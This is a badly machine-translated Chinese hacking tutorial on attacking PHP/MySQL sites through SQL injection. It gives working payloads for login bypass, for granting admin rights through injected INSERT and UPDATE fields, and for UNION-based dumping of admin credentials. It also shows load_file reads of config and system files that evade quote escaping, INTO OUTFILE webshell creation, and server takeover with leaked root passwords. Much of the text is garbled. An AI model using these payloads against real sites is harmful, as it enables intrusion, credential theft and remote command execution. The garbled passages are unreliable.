PHP + MYSQL injection topic

xiaoxiao2021-03-06 41

Author: alpha from: http: //www.cnwill.com/ Php injection attacks is by far the most popular way to attack, relying on its powerful flexibility to attract the majority of black fans. In the previous issue, "PHP Safety and Injection Topics" Zhonglin .Linx mainly tells the various vulnerabilities of the PHP program, but also the problem of PHP mysql injection, but the problem of injection is relatively small, let us feel that there is no happiness. OK, I will blow the PHP mysql injection for everyone, so you must return you (Who throws brick!). This article is mainly serving the small dishes. If you are already a old bird, some things will feel more boring, but as long as you look at it, you will find a lot of interesting things. Read this article, you only have to understand this thing below. 1. I understand how the PHP MySQL environment is built, and the related articles we have included in the CD, if you are not very clear about building a PHP MySQL environment, please check this article first, introduced in the previous topic. . 2. Probably understand the configuration of PHP and Apache, mainly use php.ini and httpd.conf, and this article we mainly use is the configuration of php.ini. In order to be safe, we generally open the security mode in php.ini, that is, let Safe_Mode = ON, and one is to return to PHP execution errors, which will return a lot of useful information, so we should close, let Display_ERRORS = OFF After the error is turned off, the PHP function executes the error message will not be displayed again. In PHP configuration file php.ini has a very important configuration option MAGIC_QUOTES_GPC, the high version of the default is magic_quotes_gpc = ON, only the default configuration in the original antique PHP is Magic_QUOTES_GPC = Off, but the antique thing Some people have used it! When Magic_QUOTES_GPC = ON occurs during php.ini, there is no panic, the sky is can't collapse! It is just to automatically turn all the '(single quotes), "(dual quotes), / (double quotes), / (double quotes), and empty characters in the submitted variable, such as turning' into / ', Turn it into //. That's this, let us very bad, many times we have to say Byebye, but we will have a good way to deal with it. Watch! 3. There is a certain PHP language basis and understand some SQL statements, these are very simple, we use things very little, so charging still! Let's take a look at Magic_QUOTES_GPC = OFF, we can do it Something, then we want to engage in Magic_QUOTES_GPC = ON case: magic_quotes_gpc = OFF injection attack MAGIC_QUOTES_GPC = OFF The situation is very unsafe, the new version will make magic_quotes_gpc = ON, but there are many In the server, we also found MAGIC_QUOTES_GPC = OFF, such as www.qichi. *. There are some programs like the VBB Forum Even if you configure Magic_QUOTES_GPC = ON, it will automatically eliminate the escape character to make us organically multiply, so say maic_quotes_gpc = OFF injection method is also a big market.

Below we will explain in a few aspects of grammar, injecting point and injection types, Mysql PHP injection A: From mysql syntax first 1. Let's talk about the basic syntax of MySQL, it is for children who don't have a good study. Oh ~ _ ~ 1) SELECT SELECT [stright_join] [SQL_SMALL_RESULT] select_expression, ... [INTO {Outfile | Dumpfile} 'file_name' export_Options] [from Table_reference [Where where_definition] [group by col_name, ...] [Order by {unsigned_integer | col_name | formula} [ASC | DESC], ...]] is commonly used, select_expression refers to the column you want to retrieve, then we You can use WHERE to limit the conditions, and we can also use Into Outfile to output the select result into the file. Of course, we can also directly output, such as mysql> select 'a'; - | A | - - | A | - 1 ROW IN Set (0.00 sec) specific content, please see mysql Chinese Manual 7.12 Says Some Useful Use of Code First Code is used to search.

......... SELECT * from users where username like '% $ search%' Order by username .......> Here us say the wildcard in MySQL, '%' is a wildcard, Other wildcards also have '*' and '_', where "*" is used to match the field name, and "%" is used to match the field value, note that% must be applied with the LIKE, and a wildcard, is underline "_", Its representative meaning and above, is used to match any single character. In the above code, we use '*' to indicate all field names returned, and% $ search% indicate all content that contains $ Search characters. How do we inject? Haha, and ASP is similar to the AABB% 'or 1 = 1 ORDER BY ID # Note: # # 注 m m 中中中不 l l l l l l l l l l l l 不Perhaps someone will ask why I use or 1 = 1, look at it, bring the submitted content into the SQL statement into the SQL statement becomes select * from users where username Like '% AABB%' or 1 = 1 Order by ID # Order by UserName If there is no user name containing AABB, or 1 = 1 makes the return value true, enabling all values. We can also submit% 'Order By ID # or' Order By ID # in the form in the form of the SQL statement Cheng Select * from users where username like '%%' Order by id # Order by username and select * from username where username Like '%%' Order by id # Order by username is of course, the content returns. List all users, no password is coming out. Here is an example, there will be a more exquisite SELECT statement, and select is almost everywhere! 2) Look below this explanation in the Update m q 中文 manual: update [low_priority] tbl_name set color_name1 = expr1, col_name2 = expr2, ... [where where_definition] Update updates the list of row in the existing table, set clause points out Which column wants to modify and they should be given the value, where clause, if given, specify which line should be updated, otherwise all rows are updated. Details go to the mysql Chinese manual 7.17, the words that will be detailed here will be very proud. It is known that Update is primarily used for data updates, such as the modification of the article. We seem to be more concerned about the latter, because ... look at the code first, let's give the structure, so everyone Uns (ID INT (10) Not Null Auto_INCREMENT, Login Varchar (25), Password Varchar (25), Email Varchar (30), Userlevel Tinyint, Primary Key (ID)) where the USERLEVEL representation, 1 is managed Servers, 2 for ordinary users

//change.php ... $ sql = "Update users set password = '$ pass', email = '$ email' where id = '$ ID'" ...?> OK, we I started to inject, adding the email place We add Netsh @ 163.com ', userlevel =' 1 SQL statement is UPDATEERS set password = 'YOUPASS', Email = 'netsh @ 163.com', userlevel = '1' where id = 'YOUID' Look at our userlevel is 1, become an administrator. Haha, so cool, it is a must-have for home travel. Here we simply mention the problem of single quotation, if only one single quotes are used without single quotes, the system will return an error. Column Types are divided into digital types, date and time types, string types, however quotes are generally used in string types, and in digital types, ordinary people will not use quotation marks (however it can be used, and power is very powerful Large), date and time types are rarely used for injection (because few submitted time variables). In the following we will detail these types of injection methods! 3) The next round to INSERT, it has been waiting for impatient, just like the students in the noon cafeteria. PHP Chinese manual teaches us: Insert [low_priority | delayed] [ignore] [INTO] TBL_NAME [(Col_name, ...)] Values (Expression, ...), (...), ... insert Insert a new line into an existing table, insert ... Values form statement based on the explicit specified value inserted, insert ... Select Form Insert from other tables, there are multiple values of INSERT.. The form of VALUES is supported in MySQL 3.22.5 or later, col_name = expression syntax is supported in MySQL 3.22.10 or later. It can be seen that in order to see the background, INSERT mainly appears in a registered place, or there are other places where you submit it. Take a look at the structure of the table Create Table Membres (id varchar (15) Not null default ', login varchar (25), Password varchar (25), Email Varchar (30), Userlevel Tinyint, Primary Key (ID)) We are still Suppose UserLevel represents the user level, 1 for the manager, 2 is ordinary users. code show as below

//reg.php ... $ query = "INSERT INTO MEMBERS VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')"; .... ..> Default Insert User Level 2 Now we build the injection statement, or if you want us to enter the email, enter: netsh@163.com ',' 1 ') # SQL statement to perform: Insert Into MEMBRES Values ('Youid', 'Youname', 'Youpass ",' Netsh@163.com ',' 1 ') #' ,? ') Seeing that our registration is an administrator. # 号 What said, not forgot, dizzy, so fast? Forget it, let you talk about it in detail. 2. Let's talk about the comments in MySQL. This is very important. You can't sleep anymore. If you sleep, you will hang you when you go to the end of the exam. We continue to believe that everyone has seen the powerful role of comments in several examples, here we will introduce it in detail. MySQL has three annotation sentences # 注掉注注内容本同同方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法方法. - Remember that there is a space behind you to get an annotation. /*...*/ We generally use the front / * is enough, because we can't do it behind, right? Note: When the browser address bar is input #, you should write it into% 23, so that after the Urlencode conversion can be converted #, it is a role in the comment. # 号 Your words in the browser address box are not ok. In order to understand this, I will give you an example of the following administrator information table Create Table Alphaauthor (ID tinyint (4) Not null auto_increment, username varchar (50) not null default ', Password', Password Varchar (50) Default Null, Name Varchar (50) Default Null, Primary Key (ID), UNIQUE Key ID (ID), Key ID_2 (ID))

//Login.php ... $ query = "select * from alphaauthor where username = '$ usrname' and password = '$ passwd'"; $ query); $ data = mysql_fetch_Array ($ Result); if ($ data) {echo "important information";} else echo "landing failed"; ...?> We directly enter http: //**/login.php directly in the browser address box UserName = a'or id = 1% 23% 23 Convert into # 了了到 l a =or a u = 'a'or id = 1 #' and password = '$ passwd' ## I have entered it, see this sentence is equivalent to select * from alphaauthor where username = 'a'or id = 1 looks carefully to look at the structure, as long as there is ID = 1 account, the returned $ data should be true We will go directly, of course, you can also write hppt: //***/login.php? Username = a'or 1 = 1% 23 is the same 3. The following will appear ... It is the spy version of these display system information () Returns the database version information Database () Returns the current database name, if there is no current database, Database () returns an empty string. User () system_user () session_user () Returns the current mysql username mysql> select user (), database (), version (); ---------------- - --------- ---------------- | User () | Database () | Version () | --------- ------- ------------ ---------------- | root @ localhost | alpha | 5.0.0-alpha -NT | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 1 ROW IN Set (0.01 sec) as shown in Figure (1), the picture is not very cool? Watch your big eyes, sometimes it is useful, for example, you can see if his MySQL is overwhelmed by his mysql, it is not allowed to find a good power, haha 4. The following The important part, I didn't sleep, I wake up awake. 1) SELECT UNION SELECT is also in the PHP Chinese manual: SELECT ... Union [all] select ... [Union Select ...] Union is implemented in MySQL 4.0.0. UNION is used to combine the results of multiple SELECT statements to a result set. The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.

The select command is a normal selection command, but there is a limit: only the last select command can have Into Outfile. It should be noted that the number of SELECT fields before and after UNION is the same, and only the UNION function can play a role. If the number of fields will return Error 1222 (21000): The UseT Statements Have A Different Number of Columns error, this is not good. Is it half? Don't happe, urgently use, for example: ALPHADB table has 11 columns we mysql> Select * from alphadb where id = 351 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 From alphaauthor; as shown (2) We only Slect 10 numbers of course, wrong. See mysql> select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11 from alphaauthor; Figure (3) Let's see ID = 247 Data first mysql> select * from alphadb where id = 347; ---- ----------------------------- --------------- ----------------- | ID | TITLE | Content | ImportTime | Author | Accessing | Addinto | TYPE | Showup | Change_UBB | Change_HTML | ----- ------------------------------------- ------- ----------------- | 347 | Take advantage of adsutil.vbs ..- published in the Man Association 2004.6 | Posted in Hacker x Archive 6th Period | 2004-03-28 11:50:50 | Alpha | 17 | Alpha | 2 | 1 | 1 | 1 | ----- ------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------- ---------------- 1 ROW in Set (0.00 sec) We see, its return result and mysql> select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11 from alphaauthor; identical. Oh, everyone may ask, what is the use? Asked good. OK, continue the test When we enter a non-existent id, for example, id = 0, or id = 347 and 1 <> 1 to see mysql> select * from alphadb where id = 347 and 1 <> 1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor; Figure (4) We found that it will take us 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 assigned to each field to display. Haha, finally showed a different, but what is this? Don't tell you first.

Let's tell a specific example first http://localhost/site/display.php? Id = 347 Take a look at the 5 http://localhost/site/display.php? Id = 347 and 1 <> 1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor results As Figure 6 Let's use a picture to summarize Union's usage as shown in Figure 7 ok, know how to use it? If you don't know, you will tell you in detail. 2) Load_file This function is too powerful, this is also the method mentioned in the last topic. Although I said, I have to mention it. Load_file can return the contents of the file, remember to write the full file path and file name ETC. We entered mysql> select load_file in MySQL command line; effect is as shown (8), but we are How do you do it in the web? We can use http://localhost/site/display.php? Id = 347% 20ance% 201 <> 1% 20Union% 20Select% 201, 2, LOAD_FILE ('C: / Apache / HTDOCS / Site / LIB) /sql.inc'), 4, 5, 6, 7, 8, 9, 10, 11 here C: /Apache/htdocs/site/lib/sql.inc is not my profile,: p Look carefully The view in Figure 9 is undoubtedly. Why do we put load_file ('c: /apache/htdocs/site/lib/sql.inc') 3 fields? We mention that there are three types of column types, and the place where 3 in Figure 7 is displayed should be displayed in the article, and should be character type, and load_file ('c: / apache / htdocs / site / lib / sql. INC ') is also a character type, so we speculate that it can be displayed smoothly in 3 fields. In fact, there are still a lot of good use methods, continue to look down! 3) SELECT * from Table Into Outfile'File.txt 'Is there a 啥? The role is to write the content of the table to the file, know more important, we write a WebShell, haha. Of course, we are not just exporting tables, we can also export other things, look down. Hypothesis with the following table # # CREATE TABLE TEST (A Text, B Text) Engine = Myisam Default Charset = latin1; # # 导导导数据下内容 `内容` 内容 ` , Null; known my website path in c: / apache / htdocs / site / good, see your performance, type http://localhost/site/display.php? Id = 451% 20and% 201 = 2% 20% 20Union% 20Select% 201, 2, A, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20Test% 20InTo% 20outFile% 20'c: /apore/htdocs/site/cmd.php 'What is meant is to export the contents of the A column in the table to cmd.phphuang to see the content in cmd.php 1 2

0000-00-00 00:00:00 5 6 7 8 9 10 11 Let's take a look at http://localhost/site/cmd.php? Cmd = DIR As shown in Figure (10) Haha, really cool! 4) Let's tell you about the story of Load Data Infile LOAD DATA [Low_Priority] [local] infile 'file_name.txt' [Replace | ignore] INTO TABLE TBL_NAME LOAD DATA INFILE statement reads a very high speed in a text file Table. Because this statement is generally entered directly in the browser, it is not very big. Here, an example, the structure of Test's structure and the same # # # # ## data table described above `Test` # Create Table Test (a text, b text) Engine = myisam default charSet = latin1; we are in the mysql command Enter: mysql> load data infile 'c: /cmd.php' inTo Table test where c: / cmd.php content is

Note: The above content is written in a row. Through the above instructions We entered the contents of the cmd.asp into the test table. The result is shown in Figure (11) actually getting the content in the last example TEST table! Take a look, combined with Into Outfile, is it a perfect combination? The basic syntax will come here, there may be a lot of important things miss, you can go to the PHP Chinese manual, I believe you will find a lot of good things, tap it. (With Disc, we pay a php Chinese manual) B: There are mainly digital, characters, and search classes from the injection method. 1. Digital type is very common. We have always been an example of characters, everyone should still Remember how to break the administrator's password under the ASP, let's take a look at how we implement us under the address bar: http://localhost/site/display.php? Id = 451% 20and% 201 = (SELECT% 20min) ID)% 20FROM% 20alphaauthor) Judging whether there is alphaauthor, if there is a normal page (general situation, sometimes it returns what else, mainly according to the page judgment when constructing 1 = 1 and 1 = 2) http: / /localhost/site/display.php?id=451 and 1= (SELECT MIN (ID ) FROM alphaauthor where Length (Username )=5) Judging whether the UserName field is 5 http: // LocalHost / Site / Display.php? ID = 451% 20and% 201 = (Select% 20min (ID)% 20WHERE% 20LENGTH (username) = 5% 20ance% 20Length (password) = 32) Almost the same Judging the length of the Password field to the guess code, use the ASCII method to give a guess. Ascii is equivalent to ASC, haha, often watching hacker X files must be clear. http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FM% 20alphaauthor% 20where% 20ASCII (MID (username, 1, 1)) = 97) User name The first place, ascii97 is a character a http://localhost/site/display.php? Id = 451% 20and% 201 = (select% 20min (ID)% 20WHERE% 20ASCII (MID (UserName, 2) 1))) = 108) The second place, here only this picture, as shown in Figure (12) omitting the X bar below. Anyway, we finally got the username and password.

We will find that the injection method here is almost the same as the injection under the ASP. It is to turn the ASC into Ascii, turn the Len to Length, and finally we can get the manager account and password from the background, of course we have more Simple method, you can directly get http: //localhost/site/display.php? Id = 451% 20And% 20Select% 201, Username, Password, 4,5, 6, 7, 8, 9, 10, 11% 20FROM% 20alphaauthor, as shown (13) Account is Alpha, password is a long string of stuff, haha, simple and clear, see no, here showing the power of Union SELECT Powerful. The above is to guess the content in the unconfigured table. If we can also like this in the same table: The following code displays the user information according to the user ID //user.php ......... $ SQL = "Select * from user where id = $ ID"; .......... if (! $ result) {echo "wrong"; exit;} else echo "User Information" ;?> The speculation method is almost the same, that is, we don't have to use SELECT. We entered http: //localhost/user.php? Id = 1 and length (password) = 7 Display User information Description We guess the correct, huh, comeon http://localhost/user.php? Id = 1 And ASCII MID (Password, 1, 1)) = 97 first password http://localhost/user.php? id = 1 and ASCII (MID (Password, 2, 1)) = 97 second place, through this Methods Eventually we can also get ID = 1 users' account password 2. Let's take a look at the method of injection of the character model is flexible in the ASP in the method of injection, and the injection of character model in PHP is mainly mameric_quotes_gpc = Under the case of OFF. (Unless there is another case, don't tell you first), for example:

//display.php ... $ query = "select * from alphadb where id = '". $ ID. "'"; ..............?> like this It turns into characters. I don't know if you have found it. If we write the program like this, the security will improve, huh, huh, continue, we will test whether there is an injection first http://localhost/site/display.php? Id = 451 'and 1 = 1 and '' = 'http://localhost/site/display.php? Id = 451' and 1 = 2 and '' = 'Brought into the SQL statement is SELECT * from alphadb where id =' 451'and 1 = 1 and '' = '' Select * from alphadb where id = '451'and 1 = 2 and' '=' 'If you find pages information different words Description Vulnerability exists or http: // localhost / site / display .php? id = 451 'and 1 = 1% 23 http://localhost/site/display.php? id = 451' and 1 = 2% 23% 23 Transformation is the #, that is, the meaning of the comment, above Oh, if you don't have to consider the closure of the quotation marks, you don't have this method. Bring it into the SQL statement, becomes select * from alphadb where id = '451'and 1 = 1 #' is what we want! Look at the effect, http://localhost/site/display.php? Id = 451 'and 1 = 1% 23 Figure (14) Normal display! http://localhost/site/display.php? id = 451 'and 1 = 2% 23 Figure (15) Show abnormal, haha, explaining the problem existed: http://localhost/site/display.php ? ID = 451 '% 20and% 201 = 2% 20% 20Union% 20Select% 201, Username, Password, 4, 5, 6, 7, 8, 9, 10 ,11% 20From% 20alphaauthor 23 Look at Figure (16) OK, username and password come out again! 3. Let's take a look at the search type to the search.

//search.php ... $ query = "Select * from alphadb where title"% $ title% '; ..............?> Do you still still? Remember the injection in the ASP? But don't remember there is no relationship, let's see, we build the injection statement, enter a% 'and 1 = 2 Union Select 1, Username, 3, 4, 5, 6, 7 , 8, Password, 10, 11 from alphaauthor # is set in the SQL statement into a SELECT * from alphadb where title Like '% a%' and 1 = 2 Union Select 1, Username, 3, 4, 5, 6, 7, 8, password, 10, 11 from alphaauthor #% 'The result is as shown in Figure 17, come out, haha, everything is in the middle. C: Let's take a look at various injection attacks from the injecting place. 1) Let's take a look at the background.

//login.php .... $ query = "select * from alphaauthor where username = '". $ http_post_vars ["username"]. "' and password = '". $ http_post_vars ["password"]. "'"; $ result = mysql_query ($ query); $ data = mysql_fetch_array ($ result); if ($ data) {echo "Background Login success"; ESLE {Echo "re-landing"; exit;} ... ......?> UserName and Password have not been processed directly in SQL after any handle. See how we get worse? The most classic or that one: In the username and password box, enter 'or' '=' into the SQL statement into the SQL statement into the SELECT * from alphaauthor where username = '' or '' = '' and password = '' or '' = '' This to get $ DATA is definitely true, that is, we have successfully logged in. There are other bypassing methods, the principle is the same, that is, try to let $ data return to be true. We can use the following Chinese law 1. Username and password are input to 'or'a' = 'a sql into select * from alphaauthor where username =' 'or'a' = 'a' and password = '' OR 'a' = 'a' 2. Username and password are input 'or 1 = 1 and' '=' sql into select * from alphaauthor where username = '' or 1 = 1 and '' = '' and password = ' 'or 1 = 1 and' '=' 'username and password are input' or 2> 1 and '' = 'sql into select * from alphaauthor where username =' 'or 2> 1 and' '=' 'and password = '' or 2> 1 and '' = '' 3. User Name Enter 'OR 1 = 1 # Password Casual Enter SQL into SELECT * from alphaauthor where username =' or 1 = 1 # and password = 'Anything' The back is commented out, of course, returns or really.

4. Assume the application of Admin ID = 1 You can also enter the 'or ID = 1 # password casually enter SQL into select * from alphaauthor where username =' or id = 1 # and password = 'Anything' Look at the renderings 19? Log in directly! As the saying goes, I don't think I can't do it. There are more constructors waiting for the class to think about it. 2) The second commonly injected place should be regarded as a front desk. I have already mentioned many times, and it involves digital type, character type, etc., this is no longer repeated here. Just give an example to review the Bihai Chao Download Station - v2.0.3 Lite has injected vulnerabilities, the code is no longer listed, and the results are directly viewed. Http: //localhost/down/index.php? Url = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18% 20From% 20DL_USERS as shown in Figure 20 Take a look, we get a long string of the user name Alpha password we want. Why we have to put password in 3 fields, put username at 5 fields, we have already mentioned it, that is, we speculate that 3 and 5 paragraphs should be a string type, and we want to display UserName The field type of Password should be the same, so we put it like this. Why use 18 fields? I don't know if you still remember that we mention that UNION SELECT must require the same number of select before and after, we can speculate in the number of SELECTs to guess the need for 18 fields, only the content of the Union Select will be displayed normally. Oh! 3) Others such as data modification, where users are registered to have a user level application. We have already told the update and insert above, because it is not very common, this is no longer elaborated, and some advanced utilization skills on Update and Insert will be mentioned below. II: The injection attack teaching section will be entered in Magic_QUOTES_GPC = ON, when MAGIC_QUOTES_GPC = ON, all '(single quotes), "(double quotes), / (anti-slope), empty character will Automatically turned into an escape character with a backslant line. This makes a method of injection into a bubble. At this time, we can only inject the digital type and there is no intVal () process, the digital type we have talked A lot, because the digital type is not used by single quotes, there is no problem, and we can directly inject it directly. 1) If it is a character type, you must look like this, no The character is quoted on the character. Here we have to use some string processing functions, there are a lot of string processing functions. Here we mainly speel the following, specifically refer to the mysql Chinese reference manual 7.4.10. Char () interpret parameters For an integer and returns a string composed of these integer ASCII code characters. Of course, you can also use the 16 credits of characters instead of characters, which is ok, the method is to add 0x in front of the 16-based, see the example below. I will understand.

//login.php ... $ query = "select * from". $ art_system_db_table ['user']. "Where username = $ usrname and password = '". $ PW. "'"; ... ...?> Suppose we know that the username of the background is Alpha transformed into ASCII is CHAR (97, 108, 112, 104, 97) transformation into 16-based 0x616c706861 (we will provide 16 credits and ASCII conversion tools in the CD) Enter: http://localhost/site/admin/login.php? Username = char (97, 108, 112, 104, 97)% 23 SQL statement becomes: Select * from alphaauthor Where username = char (97, 108, 112, 104, 97) # a Password = '' As Figure 21 As we expect, he successfully implemented it, we got what we wanted. Of course, we can also construct http: //localhost/site/admin/login.php? Username = 0x616c706861% 23 SQL statement becomes: select * from alphaauthor where username = 0x616c706861% 23 # and password = 'we will Once, it is a success. Very sense of accomplishment, maybe you will ask us if we can actually be placed in char (), actually CHAR (97, 108, 112, 104, 97) is equivalent to 'alpha' Note Yes Alpha add quotation marks, indicating the alpha string. We know that if you do mysql> select * from dl_users where username = alpha; error 1054 (4222): Unknown Column 'Alpha' in 'Where Clause' Look at the return error. Because he will think that Alpha is a variable. So we have to add quotation marks on Alpha. The following mysql> select * from dl_users where username = 'alpha'; this is correct. If you put the ##, you will become a 'alpha #' in the SQL statement. Select * from dl_users where username = 'alpha #'; of course, there is no, because even alpha # this user No. Ok, let's take an example below.

//display.php ... $ query = "select * from". $ art_system_db_table ['Article']. "WHERE TYPE = $ TYPE; ...?> The code displays the content according to the type. $ TYPE does not filter it, and there is no additional number in the program. It is assumed that Type contains xiaohua class, Xiaohua's char () conversion is Char (120, 105, 97, 111, 104, 117, 97) We build http: //localhost/display.php? TYPE = CHAR (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union SELECT 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaaut Hor brought into the SQL statement: SELECT * FROM " . $ art_system_db_table ['article']. "Where type = char (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaauthor Look, our username and password are still out! No screenshot, imagine: p 2) Maybe someone will ask, can you use powerful load_file () in the case of magic_quotes_gpc = ON? This is The problem we have to be willing, Load_File () is the use format is load_file ('file path') We find that you can convert the 'file path' to char (). Try to look. Load_file ('c: / boot. INI ') Convert to LOAD_FILE (Char (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)) Figure 22 is put into a specific injection is http: //localhost/down/index.php? url = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, LOAD_FILE (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 to see Figure 23 Look, we saw the content of boot.ini. Unfortunately, INTO OUTFILE '' can't be bypassed, otherwise it is more cool. But there is still a place to use Select * from table intfile '' That is .... (first sell a Cat, here will tell you) Three: Some injection skills, many are personal discovery, 1.Union Select skills UNION is used to combine the results of multiple SELECT statements to a result set. The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.

However, we can use the following methods to guess the type of column, but save a lot of time, first http: //localhost/down/index.php? Url = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18) Figure 24 looks at the software description 3, the author is written 4 We can guess the position of the 3 and 4 is character, we look at 14 the number of downloads, which should be int type, right. Ok, we build it according to here, it is estimated that UserName and Password are also characterized. Try it http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20dl_users As shown in Figure 25 Haha, this method can probably guessed. 2.Load_file read and write the skills Do you have found that you can't display in the web when we use Load_File () to read and write the PHP file. For example: 'C: /apache/htdocs/site/lib/sql.inc.php' converted to hexadecimal: 0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870 We constructed as follows http:? //Localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870), 4,5,6,7,8,9,10,11 26 have been found to display the contents of the article where sql.inc.php But it is empty, why? Let's take a look at the source code of the web page 1. Original HTML <> for labeling, haha, understand! You can remember where to find it next time. 4. MD5 Damidon Shandong University Wang Dr. Wang recently engaged in MD5, we also came to work, we are more cool than him, don't compute, haha. MD5 we have a way to bypass, but not where you can, the MD5 function in PHP can not be bypassed, because all things you entered are in it, it is not running. The MD5 in the SQL statement can be bypassed. Of course, the functions in SQL can be bypass, the truth is the same. See example first:

//login.php ... $ query = "Select * from alphaauthor where username = md5 ($ usrname) and password = '" ". $ PW."' "; ...?> We direct Submit http:/login.php? Username = char (97,98)) or 1% 23 Brought into SQL statement into select * from alphaauthor where username = md5 (char (97,98)) or 1 = 1 #) and password = '"" $ PW. "' Remember that the characters are put in MD5, because there is OR 1 = 2 behind, so we just put a char (97, 98). OK, successful landing! Look, MD5 is not used in front of us. 5. Core technology, using PHP MySQL injection vulnerability directly to WebShell. . Direct use of injection to get WebShell, this should be everyone thinking, let you teach you below. Here to assume that you already know the physical path where the site is located, I assume that the website path is c: / apache / htdocs / site. Websource MySQL Connection Information in /Lib/sql.inc.php 1) Applicable to Magic_QUOTES_GPC = Off Hypothesis We can upload pictures, or TXT, ZIP, and so on, we change our Trojans into JPG suffixes, upload The content of the back path is /upload/2004091201.jpg 2004091201.jpg is good, we start http: //localhost/site/display.php? Id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('c: /apache/htdocs/site/upload/2004091201.jpg'), 4, 5, 6, 7, 8, 9, 10 ,11% 20Into% 20Outfile'c: / apache / htdocs / site / shell.php 'Because Outfile is applied, the web page is not normal, but our task is completed. As we hurry to see http://localhost/site/shell.php? Cmd = DIR is as follows 29 WebShell we have created success. Did you see the front 12? That is, we are output from SELECT 1, 2! 2) The method of saving WebShell when it is suitable for Magic_quotes_GPC = ON, obviously, can be used when Magic_QUOTES_GPC = OFF is time. We direct read his profile, using methods and techniques described in 2 http: //localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)? 4, 5, 6, 7, 8, 9, 10, 11 get SQL.inc.php content

Well, we knew the mysql root password, we found the poster http: // localhost / phpmyadmin / with root password to log in. As shown in Figure 30, we will establish a table structure content as follows: # # 数据数据结构 `` TE` # Create Table TE (cmd text not null) Engine = myisam default charSet = latin1; # # Export below the database content` TE` # Insert Into Te Values (''); ok, is the SQL input SQL input SQL in PHPMYADMIN with SELECT * from Table Into Outfile '', SELECT * FROM `TE` INTO OUTFILE 'C: / APACHE / HTDOCS / Site / Cmd1.php '; as shown in Figure 31 OK, successfully executed, we go http: //localhost/site/cmd1.php? cmd = DIR to see the effect go to Figure 32 Good WebShell is! Haha, I also like it too. But I don't know if you find that we have completed this work in the case of Magic_QUOTES_GPC = ON. Note PHPMYADMIN is too great, this is what we are talking about Magic_QUOTES_GPC = ON by bypassing! 6. Discover that we can also use Update and INSERT to insert our data, then get our Webshell, and use the above example,

//reg.php ... $ query = "INSERT INTO MEMBERS VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')"; .... ..> We entered email place

Suppose the ID we registered is 10 so we can find a place where you can inject http: //localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, Email, 4, 5, 6, 7, 8, 9, 10 ,11% 20FROM% 20User% 20where% 20 ID = 10% 20 INTO% 20Outfile'c: /apache/htdocs/site/test.php 'is good, we There is also our Wenshell. 7.Mysql's cross-library query, is you always heard of mysql can't cross library, haha, I will teach you a good way today, through this method to achieve the changed cross-library query, the method is to read directly through Load_file The file content under the Data folder under MySQL is enabled. For example, before this, let's talk about the structure of the mysql's DATA folder under the Data folder in the database name, and the folder is generated by the table name to generate three suffixes for FRM, MYD, MYI. Document, such as the alpha database in the Alpha library, two tables in the Alpha library, the alpha folder contents are as follows 33 where alphadb.frm places data in the LPhadb table, alphadb.frm plays the structure, The content of alphadb.myi is different with mysql version, and the specific can be used to open with Notepad to determine. The experiment starts to assume that we know that there is another database Yminfo210 exists, and there is a table user, User is putting this admin information. Our http://localhost/site/display.php? Id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('Yminfo210 / user.myd'), 4, 5, 6, 7, 8, 9, 10 ,11 illustrates that the directory where the load_file default is the data directory under MySQL, so we use load_file ('yminfo210 / user.myd'), of course, LOAD_FILE ('. Info210 / user.myd') Also, note that the default path of INTO OUTFILE is in the database folder. The result is as shown in Figure 34 We have seen the contents? Admin 698d51a19d8a121ce581499d7b701668 admin@your.com (? 靃?  靃? 靃? 127.0.1 d | ? ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd? E Feng Feng AM a 127.0.0.1 222 222222223423 though a bunch of garbage, but we can see that the user name is admin, password is 698d51a19d8a121ce581499d7b701668, followed by other additional information In this way, we realize the curve cross library. The following example will also mention it! Said 